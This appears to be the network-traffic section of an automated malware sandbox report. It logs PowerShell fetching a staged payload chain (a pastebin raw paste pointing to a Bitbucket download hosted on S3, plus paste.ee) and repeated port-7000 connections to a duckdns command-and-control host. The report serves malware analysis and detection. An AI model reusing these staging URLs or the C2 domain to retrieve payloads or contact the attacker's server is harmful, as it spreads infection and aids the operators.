                                                            Oct 3, 2024 06:53:35.247848988 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.247854948 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247965097 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.248011112 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.248017073 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.248133898 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.248183966 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.248191118 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272303104 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272392988 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272479057 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272491932 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.272500992 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272562981 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.272569895 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272618055 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.273195028 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.273274899 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.273993015 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.274059057 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.274099112 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.274162054 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332628965 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332698107 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332731009 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332784891 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332834959 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332886934 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332936049 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332984924 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.333023071 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.333077908 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.333669901 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.333724022 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.333802938 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.333857059 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.334609985 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.334664106 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.334688902 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.334913969 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.334964991 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.335211039 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:38.289660931 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:38.294894934 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:38.696523905 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:38.698899984 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:38.704027891 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:49.727406979 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:49.961220026 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:50.102921009 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:50.102943897 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:50.480098009 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:50.520812035 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:50.525895119 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:01.165043116 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:01.176703930 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:01.564440012 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:01.589317083 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:01.609400034 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:02.852871895 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:02.992396116 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:12.602287054 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:12.607464075 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:13.168648958 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:13.171375990 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:13.176336050 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:18.196289062 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:18.201544046 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:18.695334911 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:18.699279070 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:18.704433918 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:29.633410931 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:29.638673067 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:30.008240938 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:30.011607885 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:30.016689062 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:31.273983955 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:31.279567003 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:31.785151958 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:31.787240028 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:31.792160034 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:32.851068974 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:32.898682117 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:34.321296930 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:34.326423883 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:34.555244923 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:34.560581923 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:34.704123974 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:34.705701113 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:34.710650921 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:34.979628086 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:34.982207060 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:34.987117052 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:41.680248022 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:41.685108900 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:42.056653976 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:42.058423042 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:42.063283920 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:49.914582014 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:49.919584036 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:50.292339087 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:50.295484066 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:50.300370932 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:57.352200031 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:57.365961075 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:57.753720045 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:57.765253067 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:57.791600943 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:59.950887918 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:59.955817938 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:00.347038984 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:00.348865032 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:00.360052109 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:00.648993969 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:00.661462069 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:00.836628914 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:00.841701031 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.063225985 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.065079927 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:01.069966078 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.070821047 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:01.075599909 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.103403091 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:01.108447075 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.393882036 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.395978928 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:01.400901079 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.708782911 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:01.710572004 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:01.716747046 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:02.020011902 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:02.042057991 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:02.047048092 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:02.862709999 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:02.914439917 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:06.148992062 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:06.156620979 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:06.543004990 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:06.545749903 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:06.565073967 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:15.430324078 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:15.435524940 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:15.805767059 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:55:15.806619883 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:55:15.811460018 CEST70004971246.246.14.3192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 3, 2024 06:53:05.471793890 CEST5026353192.168.2.51.1.1.1
                                                            Oct 3, 2024 06:53:05.478642941 CEST53502631.1.1.1192.168.2.5
                                                            Oct 3, 2024 06:53:07.108673096 CEST5033453192.168.2.51.1.1.1
                                                            Oct 3, 2024 06:53:07.122102022 CEST53503341.1.1.1192.168.2.5
                                                            Oct 3, 2024 06:53:08.514564037 CEST6205653192.168.2.51.1.1.1
                                                            Oct 3, 2024 06:53:08.542387009 CEST53620561.1.1.1192.168.2.5
                                                            Oct 3, 2024 06:53:13.594391108 CEST5062353192.168.2.51.1.1.1
                                                            Oct 3, 2024 06:53:13.601444960 CEST53506231.1.1.1192.168.2.5
                                                            Oct 3, 2024 06:53:15.118194103 CEST6228053192.168.2.51.1.1.1
                                                            Oct 3, 2024 06:53:15.244723082 CEST53622801.1.1.1192.168.2.5
                                                            Oct 3, 2024 06:53:30.022438049 CEST5905953192.168.2.51.1.1.1
                                                            Oct 3, 2024 06:53:30.031774998 CEST53590591.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 3, 2024 06:53:05.471793890 CEST192.168.2.51.1.1.10x97e4Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:07.108673096 CEST192.168.2.51.1.1.10xe00bStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.514564037 CEST192.168.2.51.1.1.10x8f48Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:13.594391108 CEST192.168.2.51.1.1.10x69bbStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:15.118194103 CEST192.168.2.51.1.1.10x4664Standard query (0)toskaadmx.duckdns.orgA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.022438049 CEST192.168.2.51.1.1.10x4da6Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 3, 2024 06:53:05.478642941 CEST1.1.1.1192.168.2.50x97e4No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:05.478642941 CEST1.1.1.1192.168.2.50x97e4No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:05.478642941 CEST1.1.1.1192.168.2.50x97e4No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:07.122102022 CEST1.1.1.1192.168.2.50xe00bNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:07.122102022 CEST1.1.1.1192.168.2.50xe00bNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:07.122102022 CEST1.1.1.1192.168.2.50xe00bNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com52.216.144.11A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com52.216.56.241A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com3.5.9.142A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com3.5.21.148A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com52.216.212.185A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com54.231.196.177A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com52.216.51.17A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:08.542387009 CEST1.1.1.1192.168.2.50x8f48No error (0)s3-w.us-east-1.amazonaws.com52.216.38.161A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:13.601444960 CEST1.1.1.1192.168.2.50x69bbNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:13.601444960 CEST1.1.1.1192.168.2.50x69bbNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:15.244723082 CEST1.1.1.1192.168.2.50x4664No error (0)toskaadmx.duckdns.org46.246.14.3A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com3.5.25.83A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com16.182.69.185A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com3.5.27.162A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com52.217.112.17A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com54.231.168.217A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com52.216.114.251A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com52.216.208.241A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 06:53:30.031774998 CEST1.1.1.1192.168.2.50x4da6No error (0)s3-w.us-east-1.amazonaws.com3.5.25.37A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • pastebin.com
                                                            • bitbucket.org
                                                            • bbuseruploads.s3.amazonaws.com
                                                            • paste.ee

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549704104.20.4.235806400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 06:53:05.490550995 CEST74OUTGET /raw/V9y5Q5vv HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 06:53:05.942696095 CEST472INHTTP/1.1 301 Moved Permanently
                                                            Date: Thu, 03 Oct 2024 04:53:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Thu, 03 Oct 2024 05:53:05 GMT
                                                            Location: https://pastebin.com/raw/V9y5Q5vv
                                                            Server: cloudflare
                                                            CF-RAY: 8cca5397cf9b426d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549721104.20.4.235807096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 06:53:27.427201986 CEST74OUTGET /raw/V9y5Q5vv HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 06:53:27.892222881 CEST472INHTTP/1.1 301 Moved Permanently
                                                            Date: Thu, 03 Oct 2024 04:53:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Thu, 03 Oct 2024 05:53:27 GMT
                                                            Location: https://pastebin.com/raw/V9y5Q5vv
                                                            Server: cloudflare
                                                            CF-RAY: 8cca5420fd3d41c0-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549705104.20.4.2354436400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:06 UTC74OUTGET /raw/V9y5Q5vv HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:07 UTC388INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:07 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: MISS
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:07 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca539c2bd4438d-EWR
                                                            2024-10-03 04:53:07 UTC83INData Raw: 34 64 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 38 39 39 39 39 39 39 39 39 39 39 39 39 39 2f 61 63 61 61 61 61 61 61 61 61 61 2f 64 6f 77 6e 6c 6f 61 64 73 2f 64 73 61 64 73 64 73 61 64 73 61 64 73 61 2e 74 78 74 0d 0a
                                                            Data Ascii: 4dhttps://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt
                                                            2024-10-03 04:53:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549706185.166.143.504436400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:07 UTC118OUTGET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1
                                                            Host: bitbucket.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:08 UTC5124INHTTP/1.1 302 Found
                                                            Date: Thu, 03 Oct 2024 04:53:08 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 0
                                                            Server: AtlassianEdge
                                                            Location: https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobK [TRUNCATED]
                                                            Expires: Thu, 03 Oct 2024 04:53:08 GMT
                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                            X-Used-Mesh: False
                                                            Vary: Accept-Language, Origin
                                                            Content-Language: en
                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                            X-Dc-Location: Micros-3
                                                            X-Served-By: 49d3df9e6680
                                                            X-Version: c0c21fc30b85
                                                            X-Static-Version: c0c21fc30b85
                                                            X-Request-Count: 1773
                                                            X-Render-Time: 0.041318655014038086
                                                            X-B3-Traceid: 7e9ee825fd3145a9b0b5daf02ab0c10a
                                                            X-B3-Spanid: a4953380863fed55
                                                            X-Frame-Options: SAMEORIGIN
